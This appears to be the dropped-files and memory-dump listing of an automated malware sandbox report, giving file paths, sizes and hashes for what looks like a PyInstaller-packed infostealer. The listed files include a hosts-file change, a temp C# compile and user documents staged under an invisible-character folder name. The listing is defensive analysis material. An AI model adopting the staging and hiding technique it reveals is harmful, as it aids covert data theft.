870b54e4468db682b669887aeef1ffe496f3f69b219bda2405ac502d2dcd67b6542db6190ea6774abf1db5a7db429ce8f6d2fc5e88363569f15cf4df78da2311

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI36802\rar.exe

Filesize
615KB

MD5
9c223575ae5b9544bc3d69ac6364f75e

SHA1
8a1cb5ee02c742e937febc57609ac312247ba386

SHA256
90341ac8dcc9ec5f9efe89945a381eb701fe15c3196f594d9d9f0f67b4fc2213

SHA512
57663e2c07b56024aaae07515ee3a56b2f5068ebb2f2dc42be95d1224376c2458da21c965aab6ae54de780cb874c2fc9de83d9089abf4536de0f50faca582d09

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI36802\rarreg.key

Filesize
456B

MD5
4531984cad7dacf24c086830068c4abe

SHA1
fa7c8c46677af01a83cf652ef30ba39b2aae14c3

SHA256
58209c8ab4191e834ffe2ecd003fd7a830d3650f0fd1355a74eb8a47c61d4211

SHA512
00056f471945d838ef2ce56d51c32967879fe54fcbf93a237ed85a98e27c5c8d2a39bc815b41c15caace2071edd0239d775a31d1794dc4dba49e7ecff1555122

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI36802\select.pyd

Filesize
25KB

MD5
e021cf8d94cc009ff79981f3472765e7

SHA1
c43d040b0e84668f3ae86acc5bd0df61be2b5374

SHA256
ab40bf48a6db6a00387aece49a03937197bc66b4450559feec72b6f74fc4d01e

SHA512
c5ca57f8e4c0983d9641412e41d18abd16fe5868d016a5c6e780543860a9d3b37cc29065799951cb13dc49637c45e02efb6b6ffeaf006e78d6ce2134eb902c67

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI36802\sqlite3.dll

Filesize
644KB

MD5
74b347668b4853771feb47c24e7ec99b

SHA1
21bd9ca6032f0739914429c1db3777808e4806b0

SHA256
5913eb3f3d237632c2f0d6e32ca3e993a50b348033bb6e0da8d8139d44935f9e

SHA512
463d8864ada5f21a70f8db15961a680b00ee040a41ea660432d53d0ee3ccd292e6c11c4ec52d1d848a7d846ad3caf923cbc38535754d65bbe190e095f5acb8c3

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI36802\unicodedata.pyd

Filesize
295KB

MD5
bc28491251d94984c8555ed959544c11

SHA1
964336b8c045bf8bb1f4d12de122cfc764df6a46

SHA256
f308681ef9c4bb4ea6adae93939466df1b51842554758cb2d003131d7558edd4

SHA512
042d072d5f73fe3cd59394fc59436167c40b4e0cf7909afcad1968e0980b726845f09bf23b4455176b12083a91141474e9e0b7d8475afb0e3de8e1e4dbad7ec0

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_vjkucb0k.ced.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\beiuwces\beiuwces.dll

Filesize
4KB

MD5
5b131606b44e828d5d493517dfcef1ce

SHA1
cfed1e44ce79d215f99be994d95e03d626243b25

SHA256
4aeb5af5a80b5ede4eac9457f408c1f05fe9f47c06a073fdfd9986c9f6d935ef

SHA512
5746f14548b9589c0b5860c33f692f5c02b947a6924ec13d8dfd9e345037b24854c7e7a3426cb45ae0010595e26064cf04c695cafd37cbbbe114045f4b55d4e0

Download Submit
C:\Users\Admin\AppData\Local\Temp\ ‌ ‏ ‎\Common Files\Desktop\BackupRename.vst

Filesize
459KB

MD5
a2f6608c39fb630288c61d31a979fba0

SHA1
5056fa4f17bb57c2152b99becd306dfbb76651d1

SHA256
82af0fd4655fe6daee29743d61eee45f8d20826dba2e35489284d305be9e1887

SHA512
8a1447ad4c4f58646ce20218dfcf43dc0fb75857ace98fed876a00643c3206d2d69964935f29d254a7d1b95922ad8d6f486d3f388a11cab89a05796974231142

Download Submit
C:\Users\Admin\AppData\Local\Temp\ ‌ ‏ ‎\Common Files\Desktop\CheckpointTest.docx

Filesize
13KB

MD5
e26ac3b7e2505f6c23b404fd58aae620

SHA1
8e12f113d2f955292c7204fd831f4a39ac11d064

SHA256
e2316b96260e80895df2f6909bff2fb7af85c8ecceacff90622c82eb633e5581

SHA512
1f77684aff2e21408859214b7599ef0906479d3c7122d7d3974567fed3d38cce48463877c4af79a458fa37bfa7dc8c480385fb914dba4e7a7e4c56c5900624b7

Download Submit
C:\Users\Admin\AppData\Local\Temp\ ‌ ‏ ‎\Common Files\Desktop\DismountEnter.xlsx

Filesize
9KB

MD5
c35b4f64d318b3e4d7a685d1bb786aaf

SHA1
bfcbf1b0aee79704ba79db8181542e1dfbd8bf34

SHA256
795fba1294fbbd41135042de3d639caea9eee0f9916d76450bb9944d6249f6e0

SHA512
0729ba295a2c15294f9b2313e5481f4afc971f1fb82a4887d953d8b2127ec4b0087ea5e9df34e0c9391b628b54bcc0b5d18f5527027a916633201d62dbd53b95

Download Submit
C:\Users\Admin\AppData\Local\Temp\ ‌ ‏ ‎\Common Files\Desktop\ImportSplit.xlsx

Filesize
12KB

MD5
e5417fad8551d36397f35a55b24e6f7a

SHA1
b9f0c6c33bbd451eb794b6d9341a662a0359d066

SHA256
1e92d030297648804afa4561efad889e32fae903eb3edcc0c612f19cfaf6992e

SHA512
449a4d9c81c3a55e908defdeceb43aa1025f90637c2642a8ebb99d9d84305d3e27aba33ac67c6fb06d46c8cae30b30245469c8a50a70432993039ce75b1ac798

Download Submit
C:\Users\Admin\AppData\Local\Temp\ ‌ ‏ ‎\Common Files\Desktop\SetRedo.mp4

Filesize
515KB

MD5
8ba302af712bc70d181782689c0a48af

SHA1
de12e6fe01e136516d8e42fd2baa40d2b268dae4

SHA256
f76cc02557f1471fc5992bb579d519434d5449b3b685bb42d8181870dd09fc6e

SHA512
63f505360900a592d562b2dcb424c3207b3308bd26e98ac7dfa52d19c1c496aa51c87a02e069077ec5326ed0997b4d4a01363a3e654bc7c6df1fb00f88d25b4e

Download Submit
C:\Users\Admin\AppData\Local\Temp\ ‌ ‏ ‎\Common Files\Documents\RemoveMove.txt

Filesize
2.0MB

MD5
1c82f629d5ac3866d1e10cb580ffa31f

SHA1
fc66c3b5c7a466627bf153621aa7f84f2af81a28

SHA256
dac0f292305cb00ced44e1f053aa3339aa9d891e892e5f51f7f64f0fdc7bcaad

SHA512
f3dc0619d77978abf2a67e7c8c0af4cf019d53f40e70a83f0959d8c90cde5ae0fc3511533e99dabebd35bc96baf0adbba6c534c31d70ca7edfe70341cd5e57a7

Download Submit
C:\Users\Admin\AppData\Local\Temp\ ‌ ‏ ‎\Common Files\Downloads\BackupStep.aiff

Filesize
947KB

MD5
410cc3dcba439281e9f4b57fb5b650e6

SHA1
fefabc6dab0605b55530dd40923496a66edd83eb

SHA256
bc9b602f9284992f6caee37bb9c4446978cfc5cd5cadd97fad95e44ad45adf4d

SHA512
01cf9740e97a9a6b8f81ca3b5930d66534d4c45b64de4c6c862b70802b9fb2de810306335e2406f34442e0ae7ab85426d6c9720f4bc6a4e3423d4f1d4db267c9

Download Submit
C:\Users\Admin\AppData\Local\Temp\ ‌ ‏ ‎\Common Files\Downloads\WaitBackup.asp

Filesize
690KB

MD5
7309e85d5f78c306ba37e297d2e42b94

SHA1
391ed76aa8ee53056662bfff6dc1b24d129d7a0b

SHA256
d9aaa1c2cf4cd0875646a3fd9c4e46c9c8ba4a0b86ee0d1293f4deadbfe31c4e

SHA512
bafe778bedcb44eb0ee5c90cd1d9b3eeb28d8e273fbd32688b86a1236cd656a9e1f91f96e21e161d22c505388aeee7a1d593f84424433d57ecfb6930e0c61f65

Download Submit
C:\Users\Admin\AppData\Local\Temp\ ‌ ‏ ‎\Common Files\Music\BackupInvoke.dot

Filesize
436KB

MD5
560e03d079faa44653928eb97f5fecfe

SHA1
416cfb24a769c0acacc82bf273accd225d592ae3

SHA256
a7d7c4b7a645f934645d0d1ec139577a4571de1643e78729da0cefd5c16febc0

SHA512
b9b37513ea15e4d3d43d2036b0ff55965da0335f4a577bdf94d89b4226cd59b3e47eb960d02228fe45478e702bcb76e9ec8b1af2f4560212d229594898b65b98

Download Submit
C:\Users\Admin\AppData\Local\Temp\ ‌ ‏ ‎\Common Files\Music\ConvertSet.jpg

Filesize
457KB

MD5
f6be9c61b7c14d5fb97bedeed5d192c6

SHA1
5f56c4dace1c03ae97f768b99197020f57bdbdc1

SHA256
de6174fe8314f6bd551aac3d888ae966b72bf052eebf566853806a7a1edf7383

SHA512
49964257523f7deb708d9c79edad529dda33e924e70b18f351d2a668021f31f17d30c085985da4a744646cd44df63fffa5f4866fcc1c1c21fe4e15466002fc48

Download Submit
C:\Users\Admin\AppData\Local\Temp\ ‌ ‏ ‎\Common Files\Music\LimitShow.txt

Filesize
670KB

MD5
2e131eb223ec0b38e3f9f7221ec78071

SHA1
9cb1e254c51e141377b93615171ff23f7d0fc9f3

SHA256
e9ed96ad9503a3fdd153c58623257ac57cb8c5738e95774a6a8003b5a5e9df7f

SHA512
b89ed6f65e8eb686a13d586355416428e5a6b63f7e8cf68bdb71ed654ce0b715e72acb40bf8409372d5a3287b618d3705220f8fa315911250345a33d9e79dfa6

Download Submit
C:\Users\Admin\AppData\Local\Temp\ ‌ ‏ ‎\Common Files\Music\ShowBackup.rtf

Filesize
351KB

MD5
c63171fdf264c2096f6f780c0d303e81

SHA1
ca971aea1f1591b311097f84f0d8fedae4fdbfd4

SHA256
0b1120563c954877d795cd7d29c851b11afffe8db574a16457194f69a94a0ffa

SHA512
59a4bbace0f2078ed3891d312606d712f8816ce84e23da8e9d0440bbe4fda0f7b7754c47ab03ebe064610d3a0fbe636ac41532d0607562c00cc445f55d22a3b7

Download Submit
C:\Windows\System32\drivers\etc\hosts

Filesize
2KB

MD5
f99e42cdd8b2f9f1a3c062fe9cf6e131

SHA1
e32bdcab8da0e3cdafb6e3876763cee002ab7307

SHA256
a040d43136f2f4c41a4875f895060fb910267f2ffad2e3b1991b15c92f53e0f0

SHA512
c55a5e440326c59099615b21d0948cdc2a42bd9cf5990ec88f69187fa540d8c2e91aebe6a25ed8359a47be29d42357fec4bd987ca7fae0f1a6b6db18e1c320a6

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\beiuwces\CSCD1B0EC405C6D4B989D4D1EDB2D1ABDF.TMP

Filesize
652B

MD5
6dc9139d89f11b63179ce0510780607a

SHA1
fe25a92f0a36ece798c8eddc1690c15917227b9a

SHA256
f3fe287f46c90e23b737409c1699496b63e0118a23d73acca15abc91d11b350c

SHA512
57b34a4620db3c49212b6e5ba4788d6d438fce86eaf536017256db59eda8736b0af2a411d3cbdd6a7a127d1ec2193abd5ce3db4c439f40e95e6ac2408e4798c6

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\beiuwces\beiuwces.0.cs

Filesize
1004B

MD5
c76055a0388b713a1eabe16130684dc3

SHA1
ee11e84cf41d8a43340f7102e17660072906c402

SHA256
8a3cd008e86a3d835f55f8415f5fd264c6dacdf0b7286e6854ea3f5a363390e7

SHA512
22d2804491d90b03bb4b640cb5e2a37d57766c6d82caf993770dcf2cf97d0f07493c870761f3ecea15531bd434b780e13ae065a1606681b32a77dbf6906fb4e2

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\beiuwces\beiuwces.cmdline

Filesize
607B

MD5
45b3b909e2ff47a95df8ed7f568b1a4d

SHA1
697fabeaac6b076f0842176efd701344a9054688

SHA256
0f065dc01a8280ebb7ac1c2e8eaf2af5601d039a10365e3cceaa209e3c609bf9

SHA512
312ae8f548caa8b174261dce7135e57a6ac352e2d0395f996929cd3275ad14f47842bb823010dadea284db8d497723eeee3f83ff209108e7fd1e175a2ab570b9

Download Submit
memory/3452-199-0x0000029DB2290000-0x0000029DB2298000-memory.dmp

Filesize
32KB

Download
memory/3564-84-0x00000218B5770000-0x00000218B57F2000-memory.dmp

Filesize
520KB

Download
memory/3564-140-0x00000218B36B0000-0x00000218B36D2000-memory.dmp

Filesize
136KB

Download
memory/3564-139-0x00000218B3670000-0x00000218B3680000-memory.dmp

Filesize
64KB

Download
memory/4812-169-0x0000015BEA520000-0x0000015BEA622000-memory.dmp

Filesize
1.0MB

Download
memory/4824-56-0x00007FFCB8770000-0x00007FFCB8789000-memory.dmp

Filesize
100KB

Download
memory/4824-296-0x00007FFCB7F70000-0x00007FFCB803D000-memory.dmp

Filesize
820KB

Download
memory/4824-78-0x00007FFCB89F0000-0x00007FFCB89FD000-memory.dmp

Filesize
52KB

Download
memory/4824-186-0x00007FFCB7CD0000-0x00007FFCB7E4E000-memory.dmp

Filesize
1.5MB

Download
memory/4824-76-0x00007FFCBDED0000-0x00007FFCBDEE4000-memory.dmp

Filesize
80KB

Download
memory/4824-70-0x00007FFCA8C90000-0x00007FFCA9282000-memory.dmp

Filesize
5.9MB

Download
memory/4824-71-0x00007FFCB7F70000-0x00007FFCB803D000-memory.dmp

Filesize
820KB

Download
memory/4824-216-0x00007FFCB82A0000-0x00007FFCB82B9000-memory.dmp

Filesize
100KB

Download
memory/4824-268-0x00007FFCB8290000-0x00007FFCB829D000-memory.dmp

Filesize
52KB

Download
memory/4824-72-0x00007FFCA81A0000-0x00007FFCA86C9000-memory.dmp

Filesize
5.2MB

Download
memory/4824-74-0x00007FFCBDF70000-0x00007FFCBDF94000-memory.dmp

Filesize
144KB

Download
memory/4824-73-0x000001D9D6AF0000-0x000001D9D7019000-memory.dmp

Filesize
5.2MB

Download
memory/4824-66-0x00007FFCB8A00000-0x00007FFCB8A33000-memory.dmp

Filesize
204KB

Download
memory/4824-64-0x00007FFCB8290000-0x00007FFCB829D000-memory.dmp

Filesize
52KB

Download
memory/4824-62-0x00007FFCB82A0000-0x00007FFCB82B9000-memory.dmp

Filesize
100KB

Download
memory/4824-60-0x00007FFCB7CD0000-0x00007FFCB7E4E000-memory.dmp

Filesize
1.5MB

Download
memory/4824-288-0x00007FFCB8A00000-0x00007FFCB8A33000-memory.dmp

Filesize
204KB

Download
memory/4824-58-0x00007FFCB8640000-0x00007FFCB8663000-memory.dmp

Filesize
140KB

Download
memory/4824-159-0x00007FFCB8640000-0x00007FFCB8663000-memory.dmp

Filesize
140KB

Download
memory/4824-55-0x00007FFCB8910000-0x00007FFCB893D000-memory.dmp

Filesize
180KB

Download
memory/4824-30-0x00007FFCBDF70000-0x00007FFCBDF94000-memory.dmp

Filesize
144KB

Download
memory/4824-32-0x00007FFCBFDD0000-0x00007FFCBFDDF000-memory.dmp

Filesize
60KB

Download
memory/4824-25-0x00007FFCA8C90000-0x00007FFCA9282000-memory.dmp

Filesize
5.9MB

Download
memory/4824-83-0x00007FFCB7E50000-0x00007FFCB7F6C000-memory.dmp

Filesize
1.1MB

Download
memory/4824-297-0x00007FFCA81A0000-0x00007FFCA86C9000-memory.dmp

Filesize
5.2MB

Download
memory/4824-298-0x000001D9D6AF0000-0x000001D9D7019000-memory.dmp

Filesize
5.2MB

Download
memory/4824-309-0x00007FFCA8C90000-0x00007FFCA9282000-memory.dmp

Filesize
5.9MB

Download
memory/4824-315-0x00007FFCB7CD0000-0x00007FFCB7E4E000-memory.dmp

Filesize
1.5MB

Download
memory/4824-310-0x00007FFCBDF70000-0x00007FFCBDF94000-memory.dmp

Filesize
144KB

Download
memory/4824-349-0x000001D9D6AF0000-0x000001D9D7019000-memory.dmp

Filesize
5.2MB

Download
memory/4824-345-0x00007FFCA81A0000-0x00007FFCA86C9000-memory.dmp

Filesize
5.2MB

Download
memory/4824-359-0x00007FFCB7F70000-0x00007FFCB803D000-memory.dmp

Filesize
820KB

Download
memory/4824-358-0x00007FFCB8A00000-0x00007FFCB8A33000-memory.dmp

Filesize
204KB

Download
memory/4824-357-0x00007FFCB8290000-0x00007FFCB829D000-memory.dmp

Filesize
52KB

Download
memory/4824-356-0x00007FFCB82A0000-0x00007FFCB82B9000-memory.dmp

Filesize
100KB

Download
memory/4824-355-0x00007FFCB7CD0000-0x00007FFCB7E4E000-memory.dmp

Filesize
1.5MB

Download
memory/4824-354-0x00007FFCB8640000-0x00007FFCB8663000-memory.dmp

Filesize
140KB

Download
memory/4824-353-0x00007FFCB8770000-0x00007FFCB8789000-memory.dmp

Filesize
100KB

Download
memory/4824-352-0x00007FFCB8910000-0x00007FFCB893D000-memory.dmp

Filesize
180KB

Download
memory/4824-351-0x00007FFCBFDD0000-0x00007FFCBFDDF000-memory.dmp

Filesize
60KB

Download
memory/4824-350-0x00007FFCBDF70000-0x00007FFCBDF94000-memory.dmp

Filesize
144KB

Download
memory/4824-348-0x00007FFCB7E50000-0x00007FFCB7F6C000-memory.dmp

Filesize
1.1MB

Download
memory/4824-347-0x00007FFCB89F0000-0x00007FFCB89FD000-memory.dmp

Filesize
52KB

Download
memory/4824-346-0x00007FFCBDED0000-0x00007FFCBDEE4000-memory.dmp

Filesize
80KB

Download
memory/4824-334-0x00007FFCA8C90000-0x00007FFCA9282000-memory.dmp

Filesize
5.9MB

Download